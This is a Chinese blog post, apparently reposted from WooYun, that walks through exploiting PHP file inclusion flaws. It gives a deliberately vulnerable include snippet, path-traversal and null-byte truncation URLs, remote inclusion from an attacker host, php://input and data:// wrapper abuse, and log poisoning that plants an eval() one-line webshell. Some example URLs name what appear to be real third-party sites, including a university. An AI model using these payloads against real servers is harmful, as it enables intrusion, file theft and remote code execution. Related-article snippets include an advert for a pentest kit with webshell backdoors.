php包含那点事情

最新推荐文章于 2024-07-14 18:57:12 发布
最新推荐文章于 2024-07-14 18:57:12 发布
阅读量509 收藏
点赞数
文章标签: php 测试

_Evil (尘俗当中有太多人 相识过爱不到)   |


有空就多整理下曾经研究过的知识和需要温顾的知识,明年可能去寻工作络. 



关于PHP中LFI( Local File Include ,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的...不过 

大家都懒得测试,我就来整理下. 

1.普通本地包含;  

<?php 
$query=$_GET['p']; 

include($query); 
?>


poc : http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php

../hanguo/test.php 为包含的路径. 

baohan1.jpg  

只要目标服务器支持上传,不管是jpg,txt,gif等都可以,在其中包含 一句话木马 即可,这种方法很简单没什么可说的。 

2.截断本地包含  
require_once($a.'.php'); 


include($a.".php"); 

等等类似此包含的函数..


WINDOWS 下还有特别用处: 

\. 或者 ./ 或者 \ 或者 /截断  ( WINDOWS 都可以使用.) 

波波虎  


截断的原理  


Linux包含截断例子  (Linux  ./ / 可以.) 

%00 截断包含,有gpc=off和php版本限制 

poc : http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php%00


3.远程包含  

allow_url_include=On 就是 远程文件包含 了,为 off 那就只能 本地包含 了. 

测试case: 
<?php 
$query=$_GET['p']; 

include($query.".php"); 
?>


连接: http://www.xsser.com/explame.php?p=http://www.axxer.com/yeah.txt

爆错了: 

Warning: main(http://www.axxer.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in 

/var/www/htdocs/explame.php on line 3


include($query.".php"); 代码的缘故,在后面加上了" .php ",导致 yeah.txt 变成了 yeah.txt.php

这里我们不需要截断啦,来个 360计之----将计就计

在www.axxer.com创建个 yeah.php 文件; 

然后http://www.xsser.com/explame.php?p=http://www.axxer.com/ yeah ,自动在后面加 

.php ;多么爱。。。。 


远程包含小连接  

我们还可以用php自带协议来利用: 

包含data:// 或者php://input 伪协议

这个漏洞对于php5.0以下有效,5.3测试失败,其他大家自行总结。还是比较鸡肋,不过不亏为一种好思路。 

http://www.schnelltest24.de/index.php?page=/etc/passwd //这个没有截断,我们尝试下用协议看看. 

baohan2.jpg  

利用 协议 然后 POST发送利用代码 ,哈哈;多么有爱~~~~. 

4.日记包含高级利用  

Linux包含截断例子  

此连接已经透露出技巧了呢,连接思路简单说下: 

(1)访问带有一句话的错误连接( http://www.ujn.edu.cn/<%3fphp eval($_REQUEST[s]);%3f>xxxxxxxx... ),此连接将记录到error.log错误记录文件中. 


(2)找到包含漏洞的地方,包含到 error.log文件的路径 .然后在自定义 s参数 中输入我们恶意代码. ( http://www.ujn.edu.cn/english/depart.php?s=phpinfo();&name=../../../../../../var/log/lighttpd/error.log/././......... .) 


一先限制以及突破: 
类似http://www.exp.com/index<?php eval($_POST[cmd]);?>.php 
这样的提交,某些WEB服务器将会把空格做HTTP编码转成%20写入web日志,如果PHP包含<?php%20eval($_POST[cmd]);?>这样的语句肯定是不会成功的,所以我们必须把空格真正的写入WEB日志.

可以使用: 伪造没有Connection HTTP标头的请求包  

一点连接: 内容1  

内容2  


5.其他高级利用  

(1)包含/proc/self/environ环境变量: 
这个是利用Linux中的环境变量作为基础,很多时候这个方法行不通,因为没有/proc/self/environ的访问权限.同读取/etc/passwd一样

 

利用 (文章中第四点有详细介绍了.) 

(2) phpinfo临时文件爆破包含. //看情况而定,有的需要%00等特殊字符 截断 .上面介绍过了. 

(3)_SESSION爆破包含.   //看情况而定,有的需要%00等特殊字符 截断 .上面介绍过了. 

(2) (3)点介绍  

phpinfo爆破包含pdf
pikaqiu96
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透学习测试网站源码打包带走
05-24
渗透学习测试网站源码打包带走。asp+access注入源码;cookie注入源码;DVWA漏洞平台测试源码;ewebeditor;fck漏洞源码;fck突破“_”源码;iis6.0解析漏洞源码;phpcms2008;php包含漏洞源码;WEBSHELL箱子系统V2.0;xss漏洞测试源码;搜索注入源码;制作高级webshell后门附带工具。
Android内存优化-内存泄漏的几个场景以及解决方式
JKerving的博客
08-20 3583
一.什么是内存泄漏 在Java程序中,如果一个对象没有利用价值了,正常情况下gc是会对其进行回收的,但是此时仍然有其他引用指向这个活在堆内存中的对象,那么gc就不会认为这个对象是一个垃圾,那么就不会对其进行回收,所以它会一直活在堆内存中占用内存,这就导致了内存泄漏。 总结一下,导致内存泄漏的原因就是有一些我们永远不会使用的对象,仍然有引用指向它(当然这是在强引用的情况下),那么就不满足gc回收
web安全————PHP安全之文件包含漏洞
longger_lee
01-13 2442
PHP安全问题     PHP由于灵活的语法成为目前非常流行的WEB开发语言,应用非常广泛。也是由于这个特点让PHP给安全工作带来了一些困扰。下面讨论PHP自身的语言问题。     文件包含漏洞:     文件包含漏洞也是代码注入的一种,代码注入的原理是注入一段用户能够控制执行的脚本或代码,并让服务器端执行。代码注入的典型代表就是文件包含(file inclusion).这种文件包含漏洞可能
php包含那点事情[WOOYUN]
weixin_30871701的博客
01-23 87
有空就多整理下曾经研究过的知识和需要温顾的知识,明年可能去寻工作络.关于PHP中LFI(Local File Include,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的...不过大家都懒得测试,我就来整理下.1.普通本地包含;<?php$query=$_GET['p'];include($query);?>poc:http://127.0.0...
php文件包含 伪协议
m0_64361111的博客
02-28 1043
PHP有很多内置 URL风格的封装协议,这类协议与fopen()、 copy()、 file_exists()和filesize()的文件系统函数所提供的功能类似。 zip:// 伪协议 先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传 在网站根目录创建1.txt,内容为 压缩,压缩后在浏览器访问 php://input ..
PHP下10件你也许并不了解的事情
12-18
以下是一些关于PHP的知识点: 1. **IP地址转换**: - `ip2long()` 和 `long2ip()` 函数是PHP中用于IP地址与整型数值之间转换的工具。将IP地址转化为整型存储在数据库中可以显著减少存储空间,从char(15)的15个字节...
基于php的webdav协议的项目
02-19
PHP中实现WebDAV,主要涉及以下几点: 1. **服务器端路由**:你需要配置一个路由系统,使得特定的HTTP请求(如PUT、DELETE等)能够被正确处理。PHP可以通过`$_SERVER['REQUEST_METHOD']`获取到请求方法,然后根据...
基于PHP的boa框架.zip
07-18
8. **命令行工具**: boa框架通常包含命令行工具,用于生成模型、控制器、迁移等,加速开发流程。 ** boa的使用步骤** 1. 安装 boa框架,可以通过Composer(PHP的包管理器)进行安装。 2. 配置项目的基本设置,如...
brasstacks-php
06-24
Brasstacks-php是一个轻量级的PHP框架,其设计哲学是“不做任何事情,直到你需要它”。这个框架的独特之处在于它的灵活性和可扩展性,它允许开发者根据项目的具体需求逐步构建功能,而不是一开始就提供大量的预设...
php获取网页标题和内容函数(不包含html标签)
10-26
通常,提取主要内容不是一件简单的事情,因为网页结构各异,可能需要根据实际情况进行调整。 例如,可以使用`DOMDocument`和`DOMXPath`来查找`<title>`元素和主要的文本内容: ```php // 添加DOM解析部分 $doc = ...
PHP编程开发工具有哪些?
红客网络编程与渗透技术
07-10 1013
PHP的开发工具种类繁多,涵盖了从集成开发环境(IDE)、代码编辑器、调试器到版本控制工具和数据库管理工具等多个方面。以下是一些常见的PHP开发工具:### 1. 集成开发环境(IDE)* **PhpStorm**:由JetBrains开发的全功能PHP IDE,提供了代码自动完成、调试器、版本控制工具等丰富的功能,支持多种框架和技术。PhpStorm拥有最现代化的功能集,可以快速便捷地进行网页开发,并支持所有PHP语言功能,是专业PHP开发的优选工具。 * **Eclipse PDT**:基于Eclips
什么是RPC?有哪些RPC框架?
yuiezt的专栏
07-09 1838
RPC(Remote Procedure Call,远程过程调用)是一种允许运行在一台计算机上的程序调用另一台计算机上子程序的技术。这种技术屏蔽了底层的网络通信细节,使得程序间的远程通信如同本地调用一样简单。RPC机制使得开发者能够构建分布式计算系统,其中不同的组件可以分布在不同的计算机上,但它们之间可以像在同一台机器上一样相互调用。
【Docker-compose】搭建php 环境
AllenIverrui的博客
07-10 987
ElasticSearch是一款非常强大的、基于Lucene的开源搜索及分析引擎;它是一个实时的分布式搜索分析引擎,它能让你以前所未有的速度和规模,去探索你的数据。它被用作全文检索结构化搜索分析以及这三个功能的组合:Wikipedia使用 Elasticsearch 提供带有高亮片段的全文搜索,还有 search-as-you-type 和 did-you-mean 的建议。卫报使用 Elasticsearch 将网络社交数据结合到访客日志中,为它的编辑们提供公众对于新文章的实时反馈。
java版的上门家政系统和PHP版的上门家政有什么区别?
baina666的博客
07-12 516
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
喰星云·数字化餐饮服务系统 多处 SQL注入漏洞复现
最新发布
0xSec
07-14 156
喰星云·数字化餐饮服务系统 not_out_depot.php、shelflife.php、not_finish.php、stock.php等多处接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
深入探索Laravel框架中的Blade模板引擎
2402_85762143的博客
07-14 478
Blade是Laravel框架自带的模板引擎,它允许你使用纯PHP代码来编写HTML模板。Blade的语法非常简洁,它使用双大括号{{ }}来输出数据,使用三组大括号!!!来输出未转义的HTML内容,以及使用符号来定义控制结构,比如@foreach@if等。
sqlmap使用之-post注入、head注入(ua、cookie、referer)
weixin_51520483的博客
07-11 186
bp抓包获取post数据将数据保存到post.txt文件加上-r指定数据文件。
使用SOAP与TrinityCore交互(待定)
skywalk8163的专栏
07-11 958
SOAP代表简单对象访问协议,是一种类似于REST的基于标准的web服务访问协议的旧形式。PHP提供了一些使此过程更容易的方法,但根据您的使用情况,您可能需要熟悉XML。考虑到您的特定RBAC访问配置,您还需要一个有权使用GM命令的用户帐户。专门为此目的创建一个受限访问帐户,而不是一个人使用的帐户,这可能是一个好主意。这将使用正确的HTTP方法(POST)以及“授权”和“正文”选项卡下的详细信息填充新集合。在Postman界面的右侧,一个符号将打开代码片段,可以将请求转换为您选择的语言。
Php文件包含的可控点
03-31
1. 文件路径:可以通过控制文件路径来包含不同的文件,如包含敏感文件或恶意文件。 2. 变量:可以通过传递不同的变量值来控制包含的文件,如传递恶意代码或命令。 3. 用户输入:可以通过用户输入的数据来控制包含的文件,如通过GET或POST参数传递恶意代码或命令。 4. Cookie:可以通过Cookie中的值来控制包含的文件,如将恶意代码存储在Cookie中。 5. HTTP头:可以通过HTTP头中的值来控制包含的文件,如通过Referer或User-Agent头来控制。 6. 环境变量:可以通过环境变量中的值来控制包含的文件,如通过PATH或LD_LIBRARY_PATH来控制。 7. 文件内容:可以通过包含文件的内容来控制执行的代码,如在文件中插入恶意代码或命令。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值